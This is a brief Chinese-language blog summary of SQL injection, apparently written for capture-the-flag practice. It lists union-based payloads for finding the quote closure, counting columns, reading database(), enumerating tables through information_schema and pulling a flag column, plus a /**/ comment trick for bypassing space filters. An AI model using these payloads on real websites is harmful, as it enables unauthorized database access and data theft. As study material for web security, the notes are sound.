SQL注入总结

0x00 前言

简单的总结一下SQL注入的内容

0x01 常规注入

通过特殊字符测试闭合,通常使用的闭合方式有' " ') ")

1.判断字段

a' union select 1,2,3 #

2.执行基础内容

a' union select 1,database(),3  #

3.查表

a' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database();#

4.查看具体数据

a' union select 1,falg,3 from web2.flag#

0x02 绕过

1.空格绕过

空格可以通过/**/进行绕过

你可能感兴趣的:(web,sql,数据库,mysql)